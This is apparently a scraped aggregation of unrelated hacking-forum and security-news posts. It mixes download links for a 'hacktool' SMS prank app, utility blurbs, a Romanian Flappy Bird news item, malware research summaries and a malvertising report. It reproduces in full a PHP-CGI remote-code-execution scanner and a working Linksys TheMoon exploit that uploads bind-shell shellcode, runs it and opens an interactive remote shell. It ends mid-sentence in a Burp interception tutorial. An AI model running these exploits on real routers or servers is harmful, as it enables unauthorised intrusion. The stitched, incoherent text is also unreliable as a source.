Fi8sVrs

http://uppit.com/mjedqwn66ag3/Entrepreneurs.rar Enjoy!

hydra 7 are protocol 3389

Download: 2keflight.txt | xup.in

Text Tools: All-in-One Notepad/Editor - An all-in-one notepad full of basic text manipulation tools. Add Prefix/Suffix into Line - Insert a prefix and/or suffix into the content of each line. Add/Remove Line Breaks - Add new line breaks and/or remove exisiting line breaks within your text's formatting. Count Characters, Words, Lines - Count your text's characters, words, sentences, lines and word frequency. Delimited Column Extractor - Extract a specific column of delimited text from each line of your input text. Find and Replace Text - Find and replace text matching your search criteria. Find and Affix Text - Find and affix text with a prefix and/or suffix. Letter Case Converter - Convert your text's letter case to UPPER, lower, RaNdOM and more. Merge Text (Line by Line) - Merge two sets of text line by line with the option of writing a prefix, divider or suffix into each merged line. Remove Duplicate Lines - Remove/delete all duplicate lines within your text/list. Remove Empty Lines - Remove/delete all empty lines within your text/list. Remove Extra Spaces - Remove leading/trailing/extra/all whitespaces from your text. Remove Letter Accents - Remove common letter accents from your text. (e.g. à will convert into a) Remove Lines Containing... - Remove lines containing or not containing your specified search text. Sort Text Lines - Sort your text's lines in alphabetical, length, random or reverse order. Obfuscation Tools: ASCII, Hex, Unicode, Base64, Binary, Octal Converter - Encode/decode ascii, hex, unicode, base64, binary, octal. Binary Code Translator - Obfuscate text by encoding it into the 0s and 1s of binary code. Very geeky! Disemvowel Tool - Remove vowels "aeiou" or any other set of letters from text. Encryption Generator - Encrypt/decrypt text via password using Tiny Encryption Algorithm (TEA) and base64. Reverse Text Generator - Reverse text, flip text, reverse wording, flip wording, reverse each word's lettering, flip letters upside down. ROT13 Caesar Cipher - Encrypt plaintext into ROT13 ciphertext or decrypt ROT13 ciphertext into plaintext. Word Scrambler/Unscrambler - Scramble/unscramble each word's lettering within a body of text. Randomization Tools: Random Line Picker - Pick random lines from your input text/list. Lines can contain names, numbers, etc. Random Number Generator - Generate random numbers from your entered low/high range with prefix, suffix and delimiter options. Random String Generator - Generate random text string(s) from your entered input elements such as characters, words, sentences, etc. String Randomizer - Randomize text strings with the option of a delimiter. Combination / Permutation Tools: Combination Generator - Make combination from text. Line Combination Generator - Make combination from lines of text. Permutation Generator - Make permutations from text. (Letters, numbers, symbols, words, sentences, etc.) Numeration Tools: Generate List of Numbers - Generate a list of sequential numbers from your selected low/high number range. Number Each Line - Add a sequential number to each line of text. Enumerate items within a list. Online Tally Counter - Count using multiple, indepently named tallies which are recorded into a printable list. Split List into Sublists - Split a list into sublists using your entered sublist amount and divider text. Math Tools: Add a List of Numbers - Total a list of numbers. Timing Tools: Online Countdown Timer - Set a time and countdown it's duration. Progress bar and blinking alarm warns when time has ended. Online Stopwatch - A precision online stopwatch that records start/split/stop times into a timer log. Image Tools: Image to Base64 Converter - Convert an image into a base64 encoded data url which will load/display as an img-src. QR Code Generator - Privately* generate QR Codes using javascript and HTML5. *No PHP server calls! Big File Tools: Count Text - Count characters, words, sentences and lines within a large text file. Join Text Files - Join text files "Line over Line" or "Line by Line" with prefix/delimiter/suffix options. Prefix/Suffix Lines - Add a prefix and/or suffix into each line of a large text file. Random Line Picker - Pick random lines from a large text file. Remove Duplicate Lines - Remove duplicate lines from a large text file. Remove Empty Lines - Remove empty lines from a large text file. Remove Extra Spaces - Remove leading/trailing/extra/all whitespaces from a large text file. Remove Lines Containing... - Remove lines containing or not containing from a large text file. Replace Text - Find and replace text in a large text file. Sort Lines - Sort the lines of a large text file. Unix/Dos Format Converter - Convert those little Unix squares into proper Notepad line breaks. onSelect Tools: Change Letter Case onSelect - Instantly change the letter case of text selected via your mouse. Convert into Unicode onSelect - Convert selected text into HTML ready unicode. Delete Text onSelect - Instantly delete text selected via your mouse. Insert Text onClick - Instantly insert text at the point clicked with your mouse. Prefix/Suffix Text onSelect - Append selected text with a prefix and/or suffix. Replace Text onSelect - Replace selected text with a your entered replacement text. Miscellaneous Tools: Keyword Phrase Generator - Entered seed text to generate keyword phrases. Text Mechanic - Text Manipulation Tools

APP for pranking mobile phones - Mobile Prank 2 Hacktool Download: Multiupload.nl - upload your files to multiple file hosting sites! Pass: protected Update Log: Added SMSGlobal with 25 Free SMS/MMS Added Cartao Dieta Added You Win Added Inquerito Restauracao Added Clube Blinko Added Free SMS 2 Added Free SMS 3 Added Free SMS 4 Added OnVerify.com Added PhoneConfirmation.com Added PT Cliente Prank Added SMSGlobal Prank Added Cryptomathic Web Bank (Mobile Phone SMS) Added CertifiCall.net (Uses Voice Recognition and user must say "I Agree") Updated Webcare Byside Added Securitas Direct Prank Removed IMDB.com | Reason: No longer available Added TOP Ringtones Added Descarregar Agora Added CellDorado Added iPad Vs Galaxy Tab 2 Added iPhone 5 Added Bala Gana Added Gomobbi Download Now Bypassed Facebook Mobile Protection Bypassed Youtube Bypassed Google Account Bypassed Google Account 2 Bypassed Microsoft Live Last version http://uppit.com/e9xdmhayp1rh/Mobile_Prank_3.rar Old version http://uppit.com/d0qwrhi6tvb3/Mobile+Prank+2+Hacktool+(Protected).rar

categorie gresita edit// si western

Junkware Removal Tool is a security utility that searches for and removes common adware, toolbars, and potentially unwanted programs (PUPs) from your computer. A common tactics among freeware publishers is to offer their products for free, but bundle them with PUPs in order to earn revenue. This tool will help you remove these types of programs. Download Virustotal SHA256: 87b361ebba82c57d7851131c3586ee27620484ff22186c12ebefe377c7ecded2 File name: JRT.exe Detection ratio: 0 / 50 Analysis date: 2014-02-19 09:53:49 UTC ( 0 minutes ago ) Anubis

AutoWifi is an application which try to login automatically on wifi hotspots with web-based authentification. This app stay in systray, and process secure login when a SSID is matched by AutoWifi. The goal is to remove the hassle of doing web-based authent for theses kinds of free hotspots, letting you surf as if you were on your lan. AutoWifi is a linux app, and it will never be released for others platforms. It's a pygtk application, and it's released under the GPL2 terms. Supports for free hotspots (thru SSL, and server certificats validation): FreeWifi FON Neuf ... It's an alpha release, but it works for me (for freewifi, neuf, and fon spots). AutoWifi doesn't provide accounts for these free hotspots ;-). The first time you meet a SSID known by AutoWifi, it will prompt you to enter your account, if needed, thru a GUI. Accounts informations are saved according the XDG freedesktop specs. (in file ~/.config/autowifi/autowifi.conf). To modify your account, just edit this file. States : The AutoWifi Icon in your systray can take 3 forms : : AutoWifi is running, but no known Wifi/SSID are matched. : A matched SSID is well authentified. AutoWifi will try to keep the connection on, by fetching it each 60 seconds. : A matched SSID is not well authentified. Put your mouse on the icon, to show the tooltip, to get more infos about the trouble. In this state, AutoWifi will try each 5 seconds to re-authent. Todo support for Mc Donalds hotspots use desktopcouch instead of xdg config (?) ensure rock solid How it's working (for developpers) Autowifi use the dbus of networkmanager to be aware about ssid changes. When a new ssid is set, Autowifi will match the newly ssid with its list of known plugins (thru a regex on ssid). If it founds one, it will run it, to process form authent with python-twill Autowifi use a home made plugin system. Plugins are easy to implement (see the _virgin.py one). Plugins are located in /usr/share/autowifi/plugins (for the main plugins) or in your home directory (in ~/.config/autowifi/plugins), for your local plugins. A plugin is a python file (which doesn't start with an underscore), which should contain a Wifi class. Here is a real example : from twill.commands import *class Wifi(object): match = "freewifi" # regex re.I ! def __init__(self): pass def connectWithAuthent(self,login,passwd): go("http://test-debit.free.fr/") if "Pour vous connecter au service FreeWiFi" in show(): formclear("1") fv("1", "login", login) fv("1", "password", passwd) submit() if "CONNEXION AU SERVICE REUSSIE" in show(): return True # authent reached else: return False # authent failed else: return True # already authentified ! Notes : match's attribut define the regular expression, to match the current SSID. It's case insensitive, and really needed ;-) a plugin should have a connect() or a connectWithAuthent() method, but not both ! These methods should return a boolean (True=authent granted / false=authent failed), or an error string (for other reasons). a plugin can use the python twill commands to mechanize http process. The easiest way to start hacking, is to duplicate the _virgin.py template (in ~/.config/autowifi/plugins). If you developp a plugin which could be interesting for the community. Feel free to send it to me, and I will package it in a future release. Installation IMPORTANT : my PPA is not up-to-date (due to quickly/launchpad trouble) you will find latest releases here AutoWifi is available in manatlan's ppa sudo add-apt-repository ppa:manatlan/ppa sudo apt-get update sudo apt-get install autowifi The repository is here : deb http://ppa.launchpad.net/manatlan/ppa/ubuntu lucid main deb-src http://ppa.launchpad.net/manatlan/ppa/ubuntu lucid main Source Repository Available on launchpad (manatlan2) autowifi

Description Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way. Features It creates a directory with all the information, including nmap output files. It uses colors to remark important information on the console. It detects some security problems like host name problems, unusual port numbers and zone transfers. It is heavily tested and it is very robust against DNS configuration problems. It uses nmap for active host detection, port scanning and version information (including nmap scripts). It searches for SPF records information to find new hostnames or IP addresses. It searches for reverse DNS names and compare them to the hostname. It prints out the country of every IP address. It creates a PDF file with results. It automatically detects and analyze sub-domains! It searches for domains emails. It checks the 192 most common hostnames in the DNS servers. It checks for Zone Transfer on every DNS server. It finds the reverse names of the /24 network range of every IP address. It finds active host using nmap complete set of techniques. It scan ports using nmap. It searches for host and port information using nmap. It automatically detects web servers used. It crawls every web server page using our Web Crawler Security Tool. It filters out hostnames based on their name. It pseudo-randomly searches N domains in google and automatically analyze them! Uses CTRL-C to stop current analysis stage and continue working. Download

Reverse Code Engineering VMWare Image It includes about ~300+ tools/programs. In size around 800 - 1500mb. Some are still zip/rar or 7z compressed. Here a collection of: Unpackers, Debuggers, patchers, etc http://www.exetools.com/unpackers.htm Windows XP PRO SP3 PE x86) Size: 1.73GB Compressed (Uncompressed size is 3.43GB) SHA1 part 1: 8bb20534ab2df28eefe4003364f09e4c522b06b3 SHA1 part 2: 48f96ba87ae11e2f3d70a248d841bf94ac460243 VMWare compatibility: Workstation 9.0 (ESX Server) Image version: 1.1 Updates, added or improvements on content and/or settings: IDA 6.1 x86 & x64 added Newest upx added A few setup unpackers added 100+ Ollydbg plugins added Explorer on default location again(not on top anymore) changed IE 8, Flash, Adobe reader added lastest versions as of today added Tutorial/paper database updated VMware RAM increased from 512mb to 1024mb changed Windows 7 ULT SP1 PE x86) Size: 2.21GB Compressed (Uncompressed size is 4.70GB) SHA1 part1: c3d6b3e04007b364eef67fdbdfbd4ca26d8a5d9a SHA1 part2: 2127b19c483b0964347d9d97809ff1828787ba76 SHA1 part3: 8f288f1a3ffe5f7aad62077ab710d422a30bf3d0 VMWare compatibility: Workstation 6.5-7.x (ESX Server) Image version: 1.2 Updates, added or improvements on content and/or settings: Nothing yet Download links XP 08y426QEAG^$#P'[s[2.m=-1@396ED$jdh23818jDh]]\'a[03lfds.z.042942 https://drive.google.com/file/d/0B9CSGyTrkEvqVUpEUnhxcU1XbGc/ Win7 =2345-;JADk45)l435.[\.fsxFDS423]\213053&&^523$@#%dgshJFD7757239 https://drive.google.com/file/d/0B9CSGyTrkEvqR3B3OUJQUGZMUUE/ Warning: The VMWare image is configured to work only on a local network (host-only). It is not connected to the internet (NAT shared). Because it is impossible for me to check and know if all those programs and tools are clean. Most of them 80% came from a trusted source. But a lot came from an unknown probably (not totally sure) un-trusted source. So please, i repeat please make sure if you use NAT to install a proxy server or vpn in it first! I have not yet installed anything in it, besides programs and tools that i trust. The image is clean as how it is now.. Please make use of snapshots so if something goes wrong you can revert back to the beginning(original state). Credits: x58 for cooking it up together Microsoft Windows XP Pro PE -> By tj007s13 Microsoft Windows 7 Ultimate x86 Lite v3 -> By nileshtambe HackHound wallpaper by ka0z All other credits to their respective owners e.g all tools and software that is included. If i forgot to add credits please pm me and i'll add them. F.A.Q. Q: Does this has warranties and support etc? A: No it does not come with ANY warranties, i will only continue to update those images and fix issues and/or add new software. Nothing else. Q: How can i run this image on other visualization software like M$ Virtual PC, VirtualBox etc? A: Yes it will work, please click on the following links for more information; VirtualBox, Virtual PC, QEMU Q: Do i have the right to share this elsewhere? Like on another forum or website. A: No you don't have unless you host the image yourself and give proper credits. Q: Will you ever make a x64 version of those images? A: Maybe i will in the future when i have the mood for it. Q: I am a beginner where do i have to start? A: I have added some tutorials and useful websites, you can go to tuts4you and learn some basics about the subject and start with it. Q: Do i have to buy VMware or where can i download VMware 9.x Workstation? A: No you don't have to download it you can use VMware player(free) or download this at your own risk, i'm not responsible(possibly not legal allowed in your country) link Q: Where can I find a complete list of all the tools installed in those images? A: Simply not because i'm too lazy to make one, just download it and see it for yourself. All the useful and most popular programs and tools are included. Q: Do you accept donations? A: Yes, only bitcoins. Address: 1CqpKC2isSPhreTquY7ekoYgzVhNn5fTXH Q: Can i be a mirror(hoster) for your VMware images? A: Yes that is possible, just shoot me a pm. RCE VMWave image for HackHound - Virtual Environment - HackHound

Dup? o s?pt?mân? în care am fost bombarda?i cu sute de clone, f?r? exagerare, ale jocului Flappy Bird, Apple ?i Google au decis s? nu mai accepte astfel de aplica?ii Flappy. Flappy Bird s-ar putea s?-?i primeasc? un episod în istoria jocurilor pe mobil pentru tevatura desf??urat? în ultimele câteva s?pt?mâni. Dup? ce dezvoltatorul ei independent, un vietnamez cu numele de Dong Nguyen, ajunsese s? câ?tige 50.000 de dolari s?pt?mânal din reclame din joc, acesta a hot?rât s?-l desfiin?eze. Pentru c? re?eta acestuia din urm? nu era deloc complicat?, mul?i al?i dezvoltatori au fost convin?i c? pot profita de acest moment pentru a se îmbog??i cu diverse clone Flappy Bird folosind nume similare. Unii dintre ei au ?i reu?it, având în vedere c? au lansat pe Google Play aplica?ii Flappy malware care trimiteau mesaje cu supratax? f?r? acordul utilizatorului. Pentru c? trendul acestor aplica?ii Flappy devenise deranjant ?i foarte multe programe lansate în aceast? perioad? ajungeau s? includ?, într-un mod aproape nejustificat, termenul Flappy, Apple ?i Google au luat o decizie radical?. Pentru prima oar? în istoria celor mai populare magazine virtuale pentru mobile, creatorii Apple AppStore ?i Google Play nu vor mai accepta aplica?ii ce au în titlu cuvântul Flappy, pe motivul c? ,,încearc? s? profite de o aplica?ie popular?”. Aceast? decizie nu a fost comunicat? oficial dar fost constatat? de mai mul?i utilizatori. Printre ace?tia se num?r? Ken Carpenter de la studioul Mind Juice Media, al c?rui joc Flappy Dragon fost respins aproape simultan de c?tre Apple ?i Google pe acela?i motiv enun?at mai sus. De?i solu?ia este cât se poate de simpl?, schimbarea numelui acelor programe, mai mul?i dezvoltatori au ajuns în ultimele zile pe re?elele de socializare pentru a-?i manifesta frustrarea pe marginea acestei decizii. Cu toate c? asta nu înseamn? c?, printr-un proces de epurare, vor fi eliminate toate clonele de Flappy Bird din cele dou? magazine de aplica?ii, important este c? s-au stabilit câteva m?suri pentru a mic?ora confuzia utilizatorilor în leg?tur? cu aplica?ii Flappy. Via

Whitepaper called Nazca: Detecting Malware Distribution in Large-Scale Networks. In this paper, they study how clients in real-world networks download and install malware, and present Nazca, a system that detects infections in large scale networks. Nazca does not operate on individual connections, nor looks at properties of the downloaded programs or the reputation of the servers hosting them. Instead, it looks at the telltale signs of the malicious network infrastructures that orchestrate these malware installation that become apparent when looking at the collective traffic produced and becomes apparent when looking at the collective traffic produced by many users in a large network. Being content agnostic, Nazca does not suffer from coverage gaps in reputation databases (blacklists), and is not susceptible to code obfuscation. They have run Nazca on seven days of traffic from a large Internet Service Provider, where it has detected previously-unseen malware with very low false positive rates. Download Mirror

This package allows you to search for snippets from the cloud and inserts them into your code without leaving Visual Studio. The Bing Code Search add-in for Visual Studio 2013 makes it easier for .NET developers to search for and reuse code samples from across the coding community, including MSDN, StackOverflow, Dotnetperls and CSharp411. Bing Code Search improves developer productivity and speed by bringing the experience of searching for reusable C# code into Visual Studio IDE. Check out this demo video for more info Download v 1.0 UPDATED 2/17/2014 Bing Code Search for C# extension

This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfiguration. #!/usr/bin/python2# Written for /r/netsec # test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths. # infodox - insecurety.net - 2013 # Twitter: @Info_dox # Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku # released under WTFPL import requests import sys def scan(target): paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5'] for path in paths: probe(target, path) def probe(target, path): print "[*] Testing Path: %s" %(path) trigger = path + "/?" trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%" trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F" trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F" trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75" trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6" trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64" trigger += "+%64%69%73%61%62%6C%65%5F%66%75%" trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2" trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65" trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+" trigger += "%61%75%74%6F%5F%70%72%65%70%65%6" trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%" trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E" url = target + trigger php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>""" try: haxor = requests.post(url, php) if "44e902a5aa760d79b76e070fa6725386" in haxor.text: print "Exploitable!" except Exception: print "Err, Someshit broke" def main(args): if len(sys.argv) !=2: print "Usage: %s <target>" %(sys.argv[0]) print "Eg: %s http://lol.com" %(sys.argv[0]) sys.exit(0) target = sys.argv[1] print "[*] Target is: %s" %(target) scan(target) if __name__ == "__main__": main(sys.argv) #_EOF infodox 2013 PHP-CGI Remote Code Execution Scanner ? Packet Storm

Hold Security reported it has discovered a list of credentials for close to 7,800 FTP servers being circulated in cybercrime forums in the Deep Web. FTP servers are considered a privileged target for cyber criminals, hackers can exploit them for example to spread malware infecting webservers that rely on FTP applications for updates. The Hold Security firm has recently reported that its experts have discovered thousands of FTP sites infected by malware, the company has found in the underground a list of credentials for nearly 7,800 FTP websites. During their DeepWeb Monitoring activity the experts have found the precious list that includes high-profile targets, a collection of FTP servers poorly protected that were victims of botnets or other infections that stolen the FTP credentials. The New York Times and UNICEF were among the high-profile victims according PC World, both have been notified. As confirmed by the founder and chief information security officer Alex Holden, it is unclear the scale and the extension of the attacks that compromised the FTP servers, from the analysis of signatures the security experts identified many similarities for the attacks. Holden identified two following different attack vectors. The hackers uploads malicious PHP scripts to the FTP servers, if the FTP servers have some link to a webserver where it is used to upload content the attackers have reached their intent. The hackers uploads HTML files onto the FTP servers, if victims navigate files list on an FTP app or server using their browser they are hijacked to a malicious website controlled by cybercriminals. The attackers use social engineering tricks to deceive victims, the files in fact have innocuous names such as Pinterest, AOL, or something related to the victim’s company. In the typical attack scenarios, victims are redirected to malicious sites proposing prescription medication, pornography or even website serving ransomware. “This is why we think it may be more than one group,” Holden said. “There are different schemes going on.” It is suggested to organization to assess their FTP servers and to improve their security. Via

SlickLogin showcased its technology at the TechCrunch Disrupt event last year Google has acquired SlickLogin - an Israeli start-up behind the technology that allows websites to verify a user's identity by using sound waves. It works by playing a uniquely generated, nearly-silent sound through computer speakers, which is picked up by an app on the user's smartphone. The app analyses the sound and sends a signal back to confirm the identity. The technology can be used either as a replacement for a password or as an additional security layer. SlickLogin confirmed the acquisition on its website but did not provide any financial details of the deal. "Today we`re announcing that the SlickLogin team is joining Google, a company that shares our core beliefs that logging in should be easy instead of frustrating, and authentication should be effective without getting in the way," the firm said in a statement. "Google was the first company to offer two-step verification to everyone, for free - and they're working on some great ideas that will make the internet safer for everyone." Secure logins Continue reading the main story “Start Quote The more uniquely a technology identifies the user, the safer the system would be against any potential hacks” Sharat Sinha Palo Alto Networks Many firms, especially those in sectors such as financial services, have been adopting a two-step verification for users. The steps include matching the user name and the password plus a second layer of verification. In some cases, such as online payments, companies message the user a one-time Pin on the mobile phone number associated with their account. The user then enters the Pin within a stipulated period of time to verify his or her identity. Some other companies, like banks, issue special gadgets that generate unique codes. Users need to enter these codes to authenticate their login. Analysts said that while these methods has been working, firms were keen to use even more secure ways to protect their users against any data theft. "The more uniquely a technology identifies the user, the safer the system would be against any potential hacks," Sharat Sinha, a vice president with Palo Alto Networks, a firm specialising in enterprise security told the BBC. "The problem with one-time Pins is that if someone hacks into your account, they can change the mobile number associated with it. "Meanwhile, specialised hardware devices provided to users are something they need to carry with them all the time," he said. Mr Sinha added that firms were looking for technology that is not only unique and highly secure, but also convenient to use. "And anything that uses smartphones makes life easier for the users." Via

DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure Today, at 2014-02-12 12:16:20 (CET), we became aware of a possible evasive/beneath the radar malvertising based g01pack exploit kit attack, taking place through the DoubleClick ad network using an advertisement featured at About.com. Investigating further, we were able to identify the actual domains/IPs involved in the campaign, and perhaps most interestingly, managed to establish a rather interesting connection between the name servers of one of the domains involved in the attacks, and what appears to be a fully operational and running Ukrainian-based ad platform, Epom in this particular case. Actual URL: hxxp://ad.doubleclick.net/N479/adi/abt.education/education_biology;p=1;svc=;site=biology;t=0;bt=9;bts=0;pc=4;oe=iso-8859-1;auc=1;fd=2;fs=1;sp2=0;go=9;a=;kw=;chan=education;syn=about;tile=1;r=1;dcopt=ist;sz=728×90;u=DBIIS70bOkWAXwch41309;dc_ref=http:/biology.about.com/library/glossary/bldefmenlawia.htm;ord=1DBIIS70bOkWAXwch41309 Malvertising domains/URLs/IPs involved in the campaign: adservinghost1.com – 212.124.112.232; 212.124.112.226 (known to have responded to the same IP is also cpmservice1.com); 212.124.112.229; 74.50.103.41; 68.233.228.236 ad.onlineadserv.com – 37.59.15.44; 37.59.15.211 hxxp://188.138.90.222/ad.php?id=31984&cuid=55093&vf=240 IP reconnaissance: 188.138.90.222 – The following domains are also known to have responded to the same IP: rimwaserver.com; notslead.com; adwenia.com – Email: philip.woronoff@yandex.ru (also known to have responded to 188.138.74.38 in the past; as well as digenmedia.com) Based on BrightCloud’s database, not only is adservinghost1.com already flagged as malicious, but also, we’re aware that MD5: dc35b211b5eb5bd8af02c412e411d40e (Rogue:Win32/Winwebsec) is known to have phoned back to the same IP as the actual domain, hxxp://212.124.112.232/cb_soft.php?q=dcee08c46ea4d86769a92ab67ff5aafa in particular. Here comes the interesting part. Apparently, the name servers of adservinghost1.com are currently responding to the same IPs as the name servers of the Epom ad platform. NS1.ADSERVINGHOST1.COM – 212.124.126.2 NS2.ADSERVINGHOST1.COM – 74.50.103.38 The following domains are also currently responding to 212.124.126.2, further confirming the connection: ns1.epom.com ads.epom.com api.epom.com directads.epom.com ns1.adshost1.com ns1.adshost2.com ns1.adshost3.com The following domains are also responding to the same IP as the Epom.com domain at 198.178.124.5: automob.com autos.net.ua epom.com formanka-masova.cz ipfire.com – Email: kaandvc@gmail.com; Email: satilikdomain@live.com smartkevin.com We’ll be keeping an eye on this beneath the radar malvertising infrastructure, and post updates as soon as new developments emerge. Via DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure Webroot Threat Blog

DB-ID: 31683 CVE: N/A OSVDB-ID: N/A Author: Rew Published: 2014-02-16 Verified: Verified Exploit Code: Download Vulnerable App: N/A Exploit for 0day linksys unauthenticated remote code execution vulnerability. As exploited by TheMoon worm; Discovered in the wild on Feb 13, 2013 by Johannes Ullrich. I was hoping this would stay under-wraps until a firmware patch could be released, but it appears the cat is out of the bag... That new Linksys worm... : netsec Since it's now public, here's my take on it. Exploit written by Rew. (Yes I know, everyone hates PHP. Deal with it ) Currently only working over the LAN. I think there may be an iptables issue or something. Left as an exercise to the reader. Based on "strings" output on TheMoon worm binary, the following devices may be vulnerable. This list may not be accurate and/or complete!!! E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300 WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N #!/usr/bin/php <?php error_reporting(0); $host = "192.168.1.1"; // target host $port = "8080"; // target port $vuln = "tmUnblock.cgi"; // hndUnblock.cgi works too // msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X $shellcode = base64_decode( "f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA". "AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA". "AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV". "BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/". "ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ". "FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI". "EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw". "8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB". "UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P". "+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp". "bi9zaA==" ); // regular urlencode() doesn't do enough. // it will break the exploit. so we use this function full_urlencode($string) { $ret = ""; for($c=0; $c<strlen($string); $c++) { if($string[$c] != '&') $ret .= "%".dechex(ord($string[$c])); else $ret .= "&"; } return $ret; } // wget is kind of a bad solution, because it requires // the payload be accessable via port 80 on the attacker's // machine. a better solution is to manually write the // executable payload onto the filesystem with echo -en // unfortunatly the httpd will crash with long strings, // so we do it in stages. function build_payload($host, $port, $vuln, $shellcode) { // in case we previously had a failed attempt // meh, it can happen echo "\tCleaning up... "; $cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z"); if(!send_packet($host, $port, $cleanup)) die("fail\n"); else echo "done!\n"; // write the payload in 20byte stages for($i=0; $i<strlen($shellcode); $i+=20) { echo "\tSending ".$i."/".strlen($shellcode)." bytes... "; $cmd = "echo -en '"; for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) { $cmd .= "\\0".decoct(ord($shellcode[$c])); } $cmd .= "' >> /tmp/c0d3z"; $cmd = build_packet($host, $port, $vuln, $cmd); if(!send_packet($host, $port, $cmd)) die("fail\n"); else echo "sent!\n"; usleep(100000); } // make it usable echo "\tConfiguring... "; $config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z"); if(!send_packet($host, $port, $config)) die("fail\n"); else echo "done!\n"; } // add in all the HTTP shit function build_packet($host, $port, $vuln, $payload) { $exploit = full_urlencode( "submit_button=&". "change_action=&". "submit_type=&". "action=&". "commit=0&". "ttcp_num=2&". "ttcp_size=2&". "ttcp_ip=-h `".$payload."`&". "StartEPI=1" ); $packet = "POST /".$vuln." HTTP/1.1\r\n". "Host: ".$host."\r\n". // this username:password is never checked "Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($exploit)."\r\n". "\r\n". $exploit; return $packet; } function send_packet($host, $port, $packet) { $socket = fsockopen($host, $port, $errno, $errstr); if(!$socket) return false; if(!fwrite($socket, $packet)) return false; fclose($socket); return true; } echo "Testing connection to target... "; $socket = fsockopen($host, $port, $errno, $errstr, 30); if(!$socket) die("fail\n"); else echo "connected!\n"; fclose($socket); echo "Sending payload... \n"; build_payload($host, $port, $vuln, $shellcode); sleep(3); // don't rush him echo "Executing payload... "; if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n"); else echo "done!\n"; sleep(3); // don't rush him echo "Attempting to get a shell... "; $socket = fsockopen($host, 4444, $errno, $errstr, 30); if(!$socket) die("fail\n"); else echo "connected!\n"; echo "Opening shell... \n"; while(!feof($socket)) { $cmd = readline($host."$ "); if(!empty($cmd)) readline_add_history($cmd); // there has got to be a better way to detect that we have // reached the end of the output than this, but whatever // it's late... i'm tired... and it works... fwrite($socket, $cmd.";echo xxxEOFxxx\n"); $data = ""; do { $data .= fread($socket, 1); } while(strpos($data, "xxxEOFxxx") === false && !feof($socket)); echo str_replace("xxxEOFxxx", "", $data); } ?> http://www.exploit-db.com/exploits/31683/

Django Static Code Analysis – with Joff Thyer DjangoSCA is a python based Django project source code security auditing system that makes use of the Django framework itself, the Python Abstract Syntax Tree (AST) library, and regular expressions. Django projects are laid out in a directory structure that conforms to a standard form using known classes, and standard file naming such as settings.py, urls.py, views.py, and forms.py. DjangoSCA is designed for the user to pass the root directory of the Django project as an argument to the program, from which it will recursively descend through the project files and perform source code checks on all python source code, and Django template files. Video: Watch Django Source Code Security Scanner - Joff Thyer | Security Weekly TV Episodes | Tech & Gadgets Videos | Blip Security Weekly Podcasts

A little over a month ago, I published a Metasploit auxiliary module for brute-forcing Cisco ASDM logins that accompanied one of our TrustKeeper Scan Engine updates. Shortly afterwards, I received requests from a couple people to share how I was able to get access to the inside of the ASDM transport layer, which is encrypted with SSL. Well, the short answer is that SSL isn’t really that much of a hurdle if the thick client you're reversing doesn’t verify the validity of the SSL certificates it’s being presented with. The longer answer, and one I hope to answer during the course of this post, is that Burp makes “middling” non-proxy aware HTTPS thick clients (like ASDM) a pretty simple and straight forward process and I’ll show you how. Overview of the Process The process for “reversing” the transport communications of these thick clients is as follows: Obtain a thick client that uses HTTPS transport Obtain a copy of Burp Start Burp with admin privileges Add a Proxy Listener w/ Redirection and Invisible Proxying Connect to proxy listener as if it was a server Have fun… Sounds pretty easy, right? Well, let's get started then. Obtaining a Thick Client The first step to getting inside a thick client's transport layer is choosing a thick client to play around with. A "thick client", for the purposes of this post, is really any client application that you would download and run to connect to a server application. I ended up using the Cisco ASDM client because I was focused on solving a specific problem, but the concepts and techniques can be repeated on most thick clients that don’t do certificate validation. I encourage you to grab a copy of ASDM (if you’ve got an ASA) or pick a different thick client and follow along. Obtaining a Copy of Burp Go here and grab a free copy of Burp: Download Burp Suite All the stuff we’ll be 